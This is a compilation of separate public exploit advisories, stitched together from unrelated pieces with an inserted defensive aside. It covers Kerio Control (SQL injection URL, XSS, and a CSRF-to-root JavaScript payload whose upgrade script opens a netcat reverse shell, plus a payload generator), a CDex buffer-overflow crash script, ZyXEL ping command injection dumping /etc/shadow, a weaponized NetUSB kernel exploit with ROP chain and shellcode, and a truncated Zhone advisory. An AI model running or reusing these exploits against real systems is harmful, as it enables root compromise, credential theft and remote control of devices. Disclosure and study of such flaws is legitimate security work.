     For example, to read out the admin's internal UUID number, the following union based sql injection can be used:
     https://testbox:4081/report.php?start=16703, 0, 0) UNION SELECT 'x', 'Admin UUID: ' || substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 1 for 14), REQUESTS FROM GET_ALL_TOP_WEBS_D(16703, 1) UNION SELECT 'y', substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 15 for 40), '7' FROM GET_ALL_TOP_WEBS_D(16703, 1);+--+&end=16703&id=0'+OR+USERNAME='Admin';+--+

     =======================
     2. Cross Site Scripting
     =======================
     The server parameter in the nonauth/certificate.php script suffers from a non-persistent XSS vulnerability. The payload needs to be base64 encoded and will be decoded at runtime. That way it bypasses all Anti-XSS Filters of modern browsers, which increases the severity of this issue significantly.

     The issue has been tested with OS X Chrome Version 45.0.2454.101, OS X Safari Version 9.0 (10601.1.56.2), Linux Chromium Version 37.0.2062.120 and Linux Iceweasel 31.8.0

     This issue is fixed in 8.6.2

     ===============================================================================================
     3. Remote Command Execution via File Upload
     ===============================================================================================
     Short Description:
     ==================
     Kerio Control suffers from a RCE vulnerability in the upgrade function in the admin interface. A malicious ssh script can be uploaded and executed with root privileges.

     Detail:
     =======
     The upgrade feature in the admin interface can be used to upload arbitrary files by simply changing a tar file to the extension .img. If a tar file is created which contains an upgrade.sh shell script, this script will be executed with root privileges.

     Kerio did not provide a fix for the upgrade functionality yet.

     ========================================
     4. Remote Command Execution through CSRF
     ========================================
     The Kerio admin interface does not provide a functionality to execute shell commands on the underlying Linux system nor a possibility to enable ssh. SSH is disabled by default and can only be enabled through the Kerio Console Application. By combining the RCE with a CSRF attack, this vulnerability becomes a serious issue.

     Proof of Concept:
     =================
     Create a Bash Script:
     ---------------------
     # cat upgrade.sh
     # #!/bin/bash
     # nc 10.0.0.2 5555 -e /bin/bash &
     # tar czf upgrade.tar.gz *
     # mv upgrade.tar.gz upgrade.img

     Open a netcat listener on the attacker's machine 10.0.0.2:
     ----------------------------------------------------------
     # nc -lvp 5555

     Generate Javascript Payload (File Upload and Execution):
     --------------------------------------------------------
     <script>
     url='http://10.0.0.1:4081/admin';
     _token="";
     _file="";
     _id = "";
     function reqListener () {
       obj = JSON.parse(this.responseText);
       file = obj.result.fileUpload.name;
       id = obj.result.fileUpload.id;
       createIFrame(file, id);
     }
     function createIFrame(file, id) {
       iframe=document.createElement("iframe");
       iframe.src=url + "/constants.js.php";
       iframe.style.display = "none";
       iframe.sandbox="allow-scripts allow-same-origin";
       iframe.onload=function() {
         cookie = iframe.contentWindow.document.cookie;
         var re = new RegExp(name + "=([^;]+)");
         var value = re.exec(cookie);
         var token=(value != null) ? unescape(value[1]) : null;
         executeScript(file, id, token);
       }
       document.body.appendChild(iframe);
     }
     function executeScript(file, id, token) {
       _file = file;
       _id = id;
       _token = token;
       var xmlhttp=new XMLHttpRequest();
       xmlhttp.open("POST", url + "/api/jsonrpc/", true);
       xmlhttp.setRequestHeader("X-Token", token);
       xmlhttp.addEventListener("load", executeScript2);
       xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
       xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
       xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));
     }
     function executeScript2(file, token) {
       var xmlhttp=new XMLHttpRequest();
       xmlhttp.open("POST", url +"/api/jsonrpc/", true);
       xmlhttp.setRequestHeader("X-Token", _token);
       xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
       xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
       xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));
     }
     var xhr = new XMLHttpRequest();
     xhr.open("POST", url + "/api/jsonrpc/upload/", true);
     xhr.addEventListener("load", reqListener);
     xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
     xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
     xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");
     xhr.withCredentials = true;
     var body = "-----------------------------1038495162429835808207612951\r\n" +
       "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" +
       "Content-Type: application/octet-stream\r\n" +
       "\r\n" +
       "\x1f\x8b\x08\x00\xe0\x6e\x02\x56\x00\x03\xed\xce\xb1\x0e\x82\x30\x10\xc6\xf1\xce\x3c\xc5\x19\x13\x37\xe1\x8a\x2d\x3e\x4f\x51\x22\x2e\x60\x5a\x78\x7f\xab\x83\x24\x0e\x3a\x11\x63\xf2\xff\xdd\xf0\x25\xf7\xdd\x70\xf3\xed\x12\xc3\xb9\x2b\x53\x6f\x56\xa3\x59\xe3\xdc\x33\xb3\xf7\x54\xf5\xce\xd8\xba\x51\x75\xcd\xf1\xe0\xf2\xde\x5a\x9f\x43\x74\xbd\x97\x16\x73\x9a\x42\x14\x31\x71\x1c\xa7\x4f\x77\xdf\xfa\x3f\xb5\xdd\x54\xed\x75\xa8\xda\x90\xfa\x62\x38\x89\xd5\xf2\x31\xb5\xf8\x4c\xf6\x9d\xbc\x5a\xd9\x15\xbf\xfe\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb8\x03\x94\x67\x18\xfa\x00\x28\x00\x00\r\n" +
       "-----------------------------1038495162429835808207612951--\r\n";
     var aBody = new Uint8Array(body.length);
     for (var i = 0; i < aBody.length; i++)
       aBody[i] = body.charCodeAt(i);
     xhr.send(new Blob([aBody]));
     </script>

     Base64 encode and craft malicious link:
     https://testbox:4081/nonauth/certificate.php?server=[base64 encoding of the script above, omitted here]

     Python 3 payload generator
     ==========================
     For easier testing, we developed a small python script that can be used to generate the payload:

     #!/usr/bin/python
     # ====================================================================== #
     # Title: Remote Command Execution through CSRF - Payload Generator        #
     # Author: Raschin Tavakoli - IntelliSec GmbH                              #
     # Date: 12.10.2015                                                        #
     #                                                                        #
     # Description:                                                           #
     # This python3 script generates the payload to exploit the RCE via CSRF  #
     # vulnerability in the Kerio Control Virtual Appliance.                  #
     #                                                                        #
     # First a shell script will be packed as a Kerio upgrade.img file. Then  #
     # a Javascript will be generated which uploads the file via the Kerio    #
     # upgrade function.
The payload will then be base64 encoded and can be # # injected into the server parameter of the # # nonauth/certificate.php script (). # # # # Example Usage: # # csrf-gen-payload.py -t https://10.0.0.8:4081/admin -l 10.0.0.7 -p 5555 # # ====================================================================== # import os import shutil import base64 import argparse import subprocess from optparse import OptionParser import codecs import sys tmpdir = "/tmp/kerio_upgrade" def usage(): print ("\nUsage: csrf-gen-payload -f <file> -t <target-url> \n") print("Example: csrf-gen-payload.py -f upgrade.sh -t https://10.0.0.8:4081/admin \n") exit() def main(): parser = OptionParser() parser.add_option("-f", "--file", dest="file", help="the bash file for remote execution", metavar="TARGET") parser.add_option("-t", "--target", dest="target_url", help="specify the target url", metavar="TARGET") (options, args) = parser.parse_args() file = options.file target_url = options.target_url if not target_url or not file: usage() # ====================================================================== # # Create upgrade.img file # # ====================================================================== # orgdir = os.path.dirname(os.path.realpath(__file__)) try: if os.path.exists(tmpdir): shutil.rmtree(tmpdir) except: print("Cannot clean " + tmpdir) os.mkdir(tmpdir) shutil.copy(file, tmpdir + os.path.sep + "upgrade.sh") os.chdir(tmpdir) os.system("tar czf upgrade.tar.gz *") src = os.path.join(tmpdir, "upgrade.tar.gz") dst = os.path.join(tmpdir, "upgrade.img") os.rename(src, dst) f = open('upgrade.img', 'rb',) bin_data = f.read() f.close() hexdata = "".join("\\x{:02x}".format(c) for c in bin_data) # ====================================================================== # # Generate Javascript Payload # # ====================================================================== # script = ('<script>\n' + 'url=\'' + target_url + '\';\n' + '_token="";\n' + '_file="";\n' + '_id = "";\n' + 'function 
reqListener () {\n' + '\tobj = JSON.parse(this.responseText);\n' + '\tfile = obj.result.fileUpload.name;\n' + '\tid = obj.result.fileUpload.id;\n' + '\tcreateIFrame(file, id);\n' + '}\n' + 'function createIFrame(file, id) {\n' + '\tiframe=document.createElement("iframe");\n' + '\tiframe.src=url + "/constants.js.php";\n' + '\tiframe.style.display = "none";\n' + '\tiframe.sandbox="allow-scripts allow-same-origin";\n' + '\tiframe.onload=function() {\n' + '\t\tcookie = iframe.contentWindow.document.cookie;\n' + '\t\tvar re = new RegExp(name + "=([^;]+)");\n' + '\t\tvar value = re.exec(cookie);\n' + '\t\tvar token=(value != null) ? unescape(value[1]) : null;\n' + '\t\texecuteScript(file, id, token);\n' + '\t}\n' + '\tdocument.body.appendChild(iframe);\n' + '}\n' + 'function executeScript(file, id, token) {\n' + '\t_file = file;\n' + '\t_id = id;\n' + '\t_token = token;\n' + '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);\n' + '\txmlhttp.setRequestHeader("X-Token", token);\n' + '\txmlhttp.addEventListener("load", executeScript2);\n' + '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' + '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' + '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));\n' + '}\n' + 'function executeScript2(file, token) {\n' + '\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);\n' + '\txmlhttp.setRequestHeader("X-Token", _token);\n' + '\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' + '\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' + '\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));\n' + '}\n' + 'var xhr = new XMLHttpRequest();\n' + 'xhr.open("POST", url + "/api/jsonrpc/upload/", true);\n' + 'xhr.addEventListener("load", 
reqListener);\n' + 'xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");\n' + 'xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");\n' + 'xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");\n' + 'xhr.withCredentials = true;\n' + 'var body = "-----------------------------1038495162429835808207612951\\r\\n" + \n' + '"Content-Disposition: form-data; name=\\"uploadImage\\"; filename=\\"upgrade.img\\" \\r\\n" + \n' + '"Content-Type: application/octet-stream\\r\\n" + \n' + '"\\r\\n" + \n' + '"' + hexdata + '\\r\\n" + \n' + '"-----------------------------1038495162429835808207612951--\\r\\n";\n' + 'var aBody = new Uint8Array(body.length);\n' + 'for (var i = 0; i < aBody.length; i++)\n' + 'aBody[i] = body.charCodeAt(i); \n' + 'xhr.send(new Blob([aBody]));\n' + '</script>') print(script) os.chdir(orgdir) shutil.rmtree(tmpdir) if __name__ == '__main__': main()
  8. '''
********************************************************************************************
# Exploit Title: CDex Genre Stack Buffer Overflow
# Date: 10/9/2015
# Exploit Author: Un_N0n
# Software Link: http://cdex.mu/download
# Version: 1.79
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Generate a File by python code mentioned below.
2- Goto C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is Produced by Python Code.
4- Open Up CDex.exe.
~Software will crash.

On Further Analysis, We come to know that it is Stack-based-BOF.

[REG-DUMP]:
EAX 00000000
ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n"   //May be handled but yet application crashes.
EDX 0012F1A1 ASCII 0A,"STATUS_STA"
EBX 00749338 CDex.00749338
ESP 0012F3E8
EBP 0012F464
ESI 00000000
EDI 002C7AC8
EIP 779DCE96 kernel32.779DCE96

0012F3F4 002C7AC8
0012F3F8 002E25F8 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F3FC 002E5FD8
0012F400 002E44A0
0012F404 000003F8
0012F408 0000007F
0012F40C 0012F504
0012F410 00260000
0012F414 77C97B89 RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
0012F418 002E2580 ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F41C 00001190
'''

# [Code to produce CDexGenres.txt]
buffer = "A"*66666
file = "CDexGenres.txt"
f = open(file, 'w')
f.write(buffer)
f.close()

'''
**********************************************************************************************
'''
  9. # Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]
# Discovered by: Karn Ganeshen
# CERT VU# 870744
# Vendor Homepage: [www.zyxel.com]
# Version Reported: [Firmware version V100AANC0b5]
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]

Vulnerability Details

CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input Validation - CVE-2015-6018

The diagnostic ping function's PingIPAddr parameter in the ZyXEL PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user input. An attacker can execute arbitrary commands as root.

OS Command Injection PoC

The underlying services are run as 'root'. It therefore allows dumping system password hashes.

HTTP Request

POST /diagnostic/diagnostic_general.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>/diagnostic/diagnostic_general.cgi
Cookie: session=a457f8ad83ba22dc256cd0b002c66666
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12062103314079176991367286444
Content-Length: 451

-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="InfoDisplay"

-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="PingIPAddr"

8.8.8.8; cat /etc/shadow
-----------------------------12062103314079176991367286444
Content-Disposition: form-data; name="Submit"

Ping
....

HTTP Response

.....
<snipped>
<br class="clearfloat" />
<!-- configuration beginning -->
<div class="headline"><span class="cTitle">General</span></div>
<table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" class="cfgpadding">
<tr>
<td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100" readonly="readonly">
root:<hash>:15986:0:99999:7:::
lp:*:13013:0:99999:7:::
nobody:*:13013:0:99999:7:::
admin:<hash>:16035:0:99999:7:::
user:<hash>:16035:0:99999:7:::
</textarea></td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" class="cfgpadding">
<tr>
-----------------------------12062103314079176991367286444--
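As an added defensive illustration, not part of the advisory above and not ZyXEL code, here is the pattern CWE-20 describes for a ping-style diagnostic parameter, a raw value spliced into a shell command line, beside a hardened handler that accepts only an IP literal and never hands the value to a shell. The function names, the sample values and the metacharacter regular expression are my own assumptions.

```python
import ipaddress
import re
import subprocess

# Constructed sample values, not captured from any device: a benign ping
# target and one carrying shell metacharacters of the kind shown above.
SAMPLE_BENIGN = "8.8.8.8"
SAMPLE_INJECTED = "8.8.8.8; cat /etc/shadow"

# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r\\'\"]")


def build_ping_command_vulnerable(ping_ip_addr):
    """The weak pattern: the raw parameter is concatenated into a string
    that will later be executed through a shell, so ';' starts a new command."""
    return "ping -c 3 " + ping_ip_addr


def validate_ping_target(ping_ip_addr):
    """Return the canonical IP literal, or raise ValueError.

    ipaddress.ip_address() accepts only a bare IPv4/IPv6 literal, so a value
    carrying ';', '|', '&&' or a hostname is rejected before anything runs.
    """
    value = ping_ip_addr.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        raise ValueError("PingIPAddr is not an IP literal: %r" % value)


def build_ping_command_hardened(ping_ip_addr):
    """Argument vector for subprocess without a shell: the validated value
    occupies exactly one argv slot and cannot become a second command."""
    return ["ping", "-c", "3", validate_ping_target(ping_ip_addr)]


def flag_suspicious_parameter(ping_ip_addr):
    """Detection-side check for request logs or a WAF rule: True when the
    submitted value contains shell metacharacters."""
    return SHELL_META.search(ping_ip_addr) is not None


def run_ping(ping_ip_addr):
    # shell=False (the default) means the argv list is passed to execve as-is.
    return subprocess.run(build_ping_command_hardened(ping_ip_addr),
                          capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    for sample in (SAMPLE_BENIGN, SAMPLE_INJECTED):
        print("raw shell string:", build_ping_command_vulnerable(sample))
        print("suspicious      :", flag_suspicious_parameter(sample))
        try:
            print("hardened argv   :", build_ping_command_hardened(sample))
        except ValueError as exc:
            print("rejected        :", exc)
```

The validation step is what closes the hole; the argv form is defence in depth, so that even a future relaxation of the validator (a hostname field, say) cannot reintroduce shell interpretation. The metacharacter check is deliberately separate from the validator: it is for alerting on attempts, not for deciding what to execute.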
  10. #!/usr/bin/env python
# Source: http://haxx.in/blasty-vs-netusb.py
#
# (Python 2: print statements, str.decode('hex'), PyCrypto)
#
# CVE-2015-3036 - NetUSB Remote Code Execution exploit (Linux/MIPS)
# ===========================================================================
# This is a weaponized exploit for the NetUSB kernel vulnerability
# discovered by SEC Consult Vulnerability Lab. [1]
#
# I don't like lazy vendors, I've seen some DoS PoC's floating around
# for this bug.. and it's been almost five(!) months. So lets kick it up
# a notch with an actual proof of concept that yields code exec.
#
# So anyway.. a remotely exploitable kernel vulnerability, exciting eh. ;-)
#
# Smash stack, ROP, decode, stage, spawn userland process. woo!
#
# Currently this is weaponized for one target device (the one I own, I was
# planning on porting OpenWRT but got sidetracked by the NetUSB stuff in
# the default firmware image, oooops. ;-D).
#
# This python script is horrible, but its not about the glue, its about
# the tech contained therein. Some things *may* be (intentionally?) botched..
# lets see if "the community" cares enough to develop this any further,
# I need to move on with life. ;-D
#
# Shoutouts to all my boys & girls around the world, you know who you are!
#
# Peace,
# -- blasty <peter@haxx.in> // 20151013
#
# References:
# [1] : https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt
# /20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt
#

import os, sys, struct, socket, time
from Crypto.Cipher import AES

def u32(v):
    return struct.pack("<L", v)

def banner():
    print ""
    print "## NetUSB (CVE-2015-3036) remote code execution exploit"
    print "## by blasty <peter@haxx.in>"
    print ""

def usage(prog):
    print "usage : %s <host> <port> <cmd>" % (prog)
    print "example : %s 127.0.0.1 20005 'wget connectback..." % (prog)
    print ""

banner()

if len(sys.argv) != 4:
    usage(sys.argv[0])
    exit(0)

cmd = sys.argv[3]

# Here's one, give us more! (hint: /proc/kallsyms and objdump, bro)
targets = [
    {
        "name" : "WNDR3700v5 - Linux 2.6.36 (mips32-le)",
        "kernel_base" : 0x80001000,
        # adjust to offset used in 'load_addr_and_jump' gadget
        # should be some big immediate to avoid NUL bytes
        "load_addr_offset" : 4156,
        "gadgets" : {
            # 8c42103c lw v0,4156(v0)
            # 0040f809 jalr v0
            # 00000000 nop
            'load_addr_and_jump' : 0x1f548,
            # 8fa20010 lw v0,16(sp)
            # 8fbf001c lw ra,28(sp)
            # 03e00008 jr ra
            # 27bd0020 addiu sp,sp,32
            'load_v0_and_ra' : 0x34bbc,
            # 27b10010 addiu s1,sp,16
            # 00602021 move a0,v1
            # 0040f809 jalr v0
            # 02202821 move a1,s1
            'move_sp_plus16_to_s1' : 0x63570,
            # 0220f809 jalr s1
            # 00000000 nop
            'jalr_s1' : 0x63570,
            'a_r4k_blast_dcache' : 0x6d4678,
            'kmalloc' : 0xb110c,
            'ks_recv' : 0xc145e270,
            'call_usermodehelper_setup' : 0x5b91c,
            'call_usermodehelper_exec' : 0x5bb20
        }
    }
]

# im lazy, hardcoded to use the only avail. target for now
# hey, at least I made it somewhat easy to easily add new targets
target = targets[0]

# hullo there.
hello = "\x56\x03"

# sekrit keyz that are hardcoded in netusb.ko, sorry KCodes
# people, this is not how you implement auth. lol.
aesk0 = "0B7928FF6A76223C21A3B794084E1CAD".decode('hex')
aesk1 = "A2353556541CFE44EC468248064DE66C".decode('hex')

key = aesk1
IV = "\x00"*16
mode = AES.MODE_CBC
aes = AES.new(key, mode, IV=IV)
aesk0_d = aes.decrypt(aesk0)
aes2 = AES.new(aesk0_d, mode, IV="\x00"*16)

s = socket.create_connection((sys.argv[1], int(sys.argv[2], 0)))

print "[>] sending HELLO pkt"
s.send(hello)
time.sleep(0.2)

verify_data = "\xaa"*16
print "[>] sending verify data"
s.send(verify_data)
time.sleep(0.2)

print "[>] reading response"
data = s.recv(0x200)
print "[!] got %d bytes .." % len(data)
print "[>] data: " + data.encode('hex')
pkt = aes2.decrypt(data)
print "[>] decr: " + pkt.encode("hex")

if pkt[0:16] != "\xaa"*16:
    print "[!] error: decrypted rnd data mismatch :("
    exit(-1)

rnd = data[16:]
aes2 = AES.new(aesk0_d, mode, IV="\x00"*16)
pkt_c = aes2.encrypt(rnd)
print "[>] sending back crypted random data"
s.send(pkt_c)

# Once upon a time..
d = "A"

# hardcoded decoder_key, this one is 'safe' for the current stager
decoder_key = 0x1337babf

# NUL-free mips code which decodes the next stage,
# flushes the d-cache, and branches there.
# loosely inspired by some shit Julien Tinnes once wrote.
decoder_stub = [
    0x0320e821, # move sp,t9
    0x27a90168, # addiu t1,sp,360
    0x2529fef0, # addiu t1,t1,-272
    0x240afffb, # li t2,-5
    0x01405027, # nor t2,t2,zero
    0x214bfffc, # addi t3,t2,-4
    0x240cff87, # li t4,-121
    0x01806027, # nor t4,t4,zero
    0x3c0d0000, # [8] lui t5, xorkey@hi
    0x35ad0000, # [9] ori t5,t5, xorkey@lo
    0x8d28fffc, # lw t0,-4(t1)
    0x010d7026, # xor t6,t0,t5
    0xad2efffc, # sw t6,-4(t1)
    0x258cfffc, # addiu t4,t4,-4
    0x140cfffb, # bne zero,t4,0x28
    0x012a4820, # add t1,t1,t2
    0x3c190000, # [16] lui t9, (a_r4k_blast_dcache-0x110)@hi
    0x37390000, # [17] ori t9,t9,(a_r4k_blast_dcache-0x110)@lo
    0x8f390110, # lw t9,272(t9)
    0x0320f809, # jalr t9
    0x3c181234, # lui t8,0x1234
]

# patch xorkey into decoder stub
decoder_stub[8] = decoder_stub[8] | (decoder_key >> 16)
decoder_stub[9] = decoder_stub[9] | (decoder_key & 0xffff)

r4k_blast_dcache = target['kernel_base']
r4k_blast_dcache = r4k_blast_dcache + target['gadgets']['a_r4k_blast_dcache']

# patch the r4k_blast_dcache address in decoder stub
decoder_stub[16] = decoder_stub[16] | (r4k_blast_dcache >> 16)
decoder_stub[17] = decoder_stub[17] | (r4k_blast_dcache & 0xffff)

# pad it out
d += "A"*(233-len(d))

# kernel payload stager
kernel_stager = [
    0x27bdffe0, # addiu sp,sp,-32
    0x24041000, # li a0,4096
    0x24050000, # li a1,0
    0x3c190000, # [3] lui t9,kmalloc@hi
    0x37390000, # [4] ori t9,t9,kmalloc@lo
    0x0320f809, # jalr t9
    0x00000000, # nop
    0x0040b821, # move s7,v0
    0x02602021, # move a0,s3
    0x02e02821, # move a1,s7
    0x24061000, # li a2,4096
    0x00003821, # move a3,zero
    0x3c190000, # [12] lui t9,ks_recv@hi
    0x37390000, # [13] ori t9,t9,ks_recv@lo
    0x0320f809, # jalr t9
    0x00000000, # nop
    0x3c190000, # [16] lui t9,a_r4k_blast_dcache@hi
    0x37390000, # [17] ori t9,t9,a_r4k_blast_dcache@lo
    0x8f390000, # lw t9,0(t9)
    0x0320f809, # jalr t9
    0x00000000, # nop
    0x02e0f809, # jalr s7
    0x00000000  # nop
]

kmalloc = target['kernel_base'] + target['gadgets']['kmalloc']
ks_recv = target['gadgets']['ks_recv']

# patch kernel stager
kernel_stager[3] = kernel_stager[3] | (kmalloc >> 16)
kernel_stager[4] = kernel_stager[4] | (kmalloc & 0xffff)
kernel_stager[12] = kernel_stager[12] | (ks_recv >> 16)
kernel_stager[13] = kernel_stager[13] | (ks_recv & 0xffff)
kernel_stager[16] = kernel_stager[16] | (r4k_blast_dcache >> 16)
kernel_stager[17] = kernel_stager[17] | (r4k_blast_dcache & 0xffff)

# a ROP chain for MIPS, always ew.
rop = [
    # this gadget will
    # v0 = *(sp+16)
    # ra = *(sp+28)
    # sp += 32
    target['kernel_base'] + target['gadgets']['load_v0_and_ra'],

    # stack for the g_load_v0_and_ra gadget
    0xaaaaaaa1, # sp+0
    0xaaaaaaa2, # sp+4
    0xaaaaaaa3, # sp+8
    0xaaaaaaa4, # sp+12
    r4k_blast_dcache - target['load_addr_offset'], # sp+16 / v0
    0xaaaaaaa6, # sp+20
    0xaaaaaaa7, # sp+24

    # this gadget will
    # v0 = *(v0 + 4156)
    # v0();
    # ra = *(sp + 20)
    # sp += 24
    # ra();
    target['kernel_base'] + target['gadgets']['load_addr_and_jump'], # sp+28
    0xbbbbbbb2,
    0xccccccc3,
    0xddddddd4,
    0xeeeeeee5,
    0xeeeeeee6,

    # this is the RA fetched by g_load_addr_and_jump
    target['kernel_base'] + target['gadgets']['load_v0_and_ra'],

    # stack for the g_load_v0_and_ra gadget
    0xaaaaaaa1, # sp+0
    0xaaaaaaa2, # sp+4
    0xaaaaaaa3, # sp+8
    0xaaaaaaa4, # sp+12
    target['kernel_base'] + target['gadgets']['jalr_s1'], # sp+16 / v0
    0xaaaaaaa6, # sp+20
    0xaaaaaaa7, # sp+24
    target['kernel_base'] + target['gadgets']['move_sp_plus16_to_s1'], # ra

    # second piece of native code getting executed, pivot back in the stack
    0x27b9febc, # t9 = sp - offset
    0x0320f809, # jalr t9
    0x3c181234, # nop
    0x3c181234, # nop

    # first native code getting executed, branch back to previous 4 opcodes
    0x03a0c821, # move t9, sp
    0x0320f809, # jalr t9
    0x3c181234,
]

# append rop chain to buffer
for w in rop:
    d += u32(w)

# append decoder_stub to buffer
for w in decoder_stub:
    d += u32(w)

# encode stager and append to buffer
for w in kernel_stager:
    d += u32(w ^ decoder_key)

print "[>] sending computername_length.."
time.sleep(0.1)
s.send(struct.pack("<L", len(d)))

print "[>] sending payload.."
time.sleep(0.1)
s.send(d)
time.sleep(0.1)

print "[>] sending stage2.."

# a useful thing to do when you bust straight into the kernel
# is to go back to userland, huhuhu.
# thanks to jix for the usermodehelper suggestion! :)
kernel_shellcode = [
    0x3c16dead, # lui s6,0xdead
    0x3c19dead, # lui t9,0xdead
    0x3739c0de, # ori t9,t9,0xc0de
    0x2404007c, # li a0, argv
    0x00972021, # addu a0,a0,s7
    0x2405008c, # li a1, argv0
    0x00b72821, # addu a1,a1,s7
    0xac850000, # sw a1,0(a0)
    0x24050094, # li a1, argv1
    0x00b72821, # addu a1,a1,s7
    0xac850004, # sw a1,4(a0)
    0x24060097, # li a2, argv2
    0x00d73021, # addu a2,a2,s7
    0xac860008, # sw a2,8(a0)
    0x00802821, # move a1,a0
    0x2404008c, # li a0, argv0
    0x00972021, # addu a0,a0,s7
    0x24060078, # li a2, envp
    0x00d73021, # addu a2,a2,s7
    0x24070020, # li a3,32
    0x3c190000, # [20] lui t9,call_usermodehelper_setup@hi
    0x37390000, # [21] ori t9,t9,call_usermodehelper_setup@lo
    # call_usermodehelper_setup(argv[0], argv, envp, GPF_ATOMIC)
    0x0320f809, # jalr t9
    0x00000000, # nop
    0x00402021, # move a0,v0
    0x24050002, # li a1,2
    0x3c190000, # [26] lui t9,call_usermodehelper_exec@hi
    0x37390000, # [27] ori t9,t9,call_usermodehelper_exec@lo
    # call_usermodehelper_exec(retval, UHM_WAIT_PROC)
    0x0320f809, # jalr t9
    0x00000000, # nop
    # envp ptr
    0x00000000,
    # argv ptrs
    0x00000000,
    0x00000000,
    0x00000000,
    0x00000000
]

usermodehelper_setup = target['gadgets']['call_usermodehelper_setup']
usermodehelper_exec = target['gadgets']['call_usermodehelper_exec']

# patch call_usermodehelper_setup into kernel shellcode
kernel_shellcode[20] = kernel_shellcode[20] | (usermodehelper_setup>>16)
kernel_shellcode[21] = kernel_shellcode[21] | (usermodehelper_setup&0xffff)

# patch call_usermodehelper_exec into kernel shellcode
kernel_shellcode[26] = kernel_shellcode[26] | (usermodehelper_exec>>16)
kernel_shellcode[27] = kernel_shellcode[27] | (usermodehelper_exec&0xffff)

payload = ""
for w in kernel_shellcode:
    payload += u32(w)

payload += "/bin/sh\x00"
payload += "-c\x00"
payload += cmd

# and now for the moneyshot
s.send(payload)

print "[~] KABOOM! Have a nice day."
  11. Vantage Point Security Advisory 2015-002
========================================

Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A (24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>

Summary:
--------

1. Insecure Direct Object Reference (CVE-2014-8356)
---------------------------------------------------

The administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by displaying the available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server.

Affected URL: http://<Router URL>/menuBcm.js

To demonstrate the issue:

1. Set your browser proxy to Burp Suite
2. Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user:
3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal.

2. Admin Password Disclosure (CVE-2014-8357)
--------------------------------------------

